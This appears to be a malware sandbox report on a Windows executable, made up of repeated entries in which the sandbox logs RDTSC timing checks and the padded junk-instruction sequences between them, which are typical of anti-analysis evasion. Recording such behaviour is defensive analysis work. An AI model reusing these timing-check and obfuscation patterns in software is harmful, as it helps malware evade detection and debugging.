Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C42F second address: 183C435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C435 second address: 183C452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF9A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C452 second address: 183C456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C4C7 second address: 183C55F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jnl 00007F9334DAF99Ch 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12A21BFDh], eax 0x0000001a sub edx, dword ptr [ebp+12A2270Ah] 0x00000020 call 00007F9334DAF999h 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jc 00007F9334DAF996h 0x0000002f popad 0x00000030 jmp 00007F9334DAF9A1h 0x00000035 popad 0x00000036 push eax 0x00000037 jg 00007F9334DAF9B6h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 push ecx 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 pop ecx 0x00000047 mov eax, dword ptr [eax] 0x00000049 jp 00007F9334DAF9A0h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185B8C6 second address: 185B8EE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9334BA002Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9334BA0035h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA7B second address: 185BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA81 second address: 185BA9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA9D second address: 185BAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BAA3 second address: 185BAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0030h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C0ED second address: 185C0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C0F3 second address: 185C109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F9334BA002Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C3C3 second address: 185C3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C3D5 second address: 185C3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C94B second address: 185C951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C951 second address: 185C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9334BA0026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C95B second address: 185C95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851AEC second address: 1851B04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9334BA0030h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B04 second address: 1851B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B08 second address: 1851B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9334BA002Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F9334BA0031h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B35 second address: 1851B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B3E second address: 1851B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B44 second address: 1851B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185CAEC second address: 185CB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F9334BA0026h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F9334BA002Ch 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e jo 00007F9334BA0044h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185CB1B second address: 185CB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D161 second address: 185D16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9334BA0026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D42C second address: 185D443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9334DAF99Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D443 second address: 185D449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D873 second address: 185D87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D87B second address: 185D88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jg 00007F9334BA0026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D88A second address: 185D88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D88E second address: 185D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185FAD4 second address: 185FAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860255 second address: 1860268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007F9334BA0038h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860268 second address: 186026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186026C second address: 1860270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860270 second address: 186028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jnl 00007F9334DAF99Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186028B second address: 186028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182179D second address: 18217B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217B9 second address: 18217C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9334BA002Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217C3 second address: 18217CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217CD second address: 18217D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217D1 second address: 18217D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FBFE second address: 181FC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F9334BA0033h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FC1C second address: 181FC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007F9334DAF996h 0x0000000c jmp 00007F9334DAF9A8h 0x00000011 jno 00007F9334DAF996h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FC4F second address: 181FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18682E7 second address: 18682EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18682EC second address: 1868314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jns 00007F9334BA003Dh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868314 second address: 186831A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868456 second address: 186845C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868AB7 second address: 1868ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868ABD second address: 1868AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868AC3 second address: 1868ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868ACD second address: 1868AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868C33 second address: 1868C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868D9E second address: 1868DC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F9334BA0031h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F9334BA0026h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A310 second address: 186A32A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9334DAF9A1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A39E second address: 186A3B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186A3B7 second address: 186A3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AC0B second address: 186AC10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AC10 second address: 186AC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186AF66 second address: 186AF6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186B38D second address: 186B397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186B397 second address: 186B39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C1E second address: 1833C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F9334DAF996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9334DAF9A8h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186E2C1 second address: 186E2D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C48 second address: 1833C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186E2D6 second address: 186E2ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0033h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1833C4F second address: 1833C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FBDF second address: 186FC60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop edi 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F9334BA0028h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 or dword ptr [ebp+12BD0136h], esi 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+12A21CE6h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F9334BA0028h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f jmp 00007F9334BA0036h 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007F9334BA002Ah 0x0000005c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC60 second address: 186FC65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC65 second address: 186FC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC6B second address: 186FC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9334DAF99Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186FC80 second address: 186FC87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187060A second address: 187060E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703AC second address: 18703B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703B0 second address: 18703BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18703BC second address: 18703C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C30 second address: 1871C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C3C second address: 1871C4E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F9334BA002Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1871C4E second address: 1871CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007F9334DAF998h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000018h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jng 00007F9334DAF99Ch 0x00000026 jo 00007F9334DAF996h 0x0000002c mov esi, edi 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F9334DAF998h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+12BC8A85h], esi 0x00000051 add edx, dword ptr [ebp+12A229E6h] 0x00000057 popad 0x00000058 push 00000000h 0x0000005a push eax 0x0000005b pop edi 0x0000005c jnl 00007F9334DAF99Ch 0x00000062 xchg eax, ebx 0x00000063 jmp 00007F9334DAF9A7h 0x00000068 push eax 0x00000069 pushad 0x0000006a jo 00007F9334DAF99Ch 0x00000070 ja 00007F9334DAF996h 0x00000076 push eax 0x00000077 push edx 0x00000078 jnl 00007F9334DAF996h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 187668B second address: 1876691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D72 second address: 18B7D7C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D7C second address: 18B7D86 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9334DAF99Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7D86 second address: 18B7D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B78E8 second address: 18B78EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B78EC second address: 18B7914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0038h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnc 00007F9334BA0026h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7914 second address: 18B791E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9334DAF996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B791E second address: 18B7938 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0034h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18B7938 second address: 18B7942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18BC5F5 second address: 18BC5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
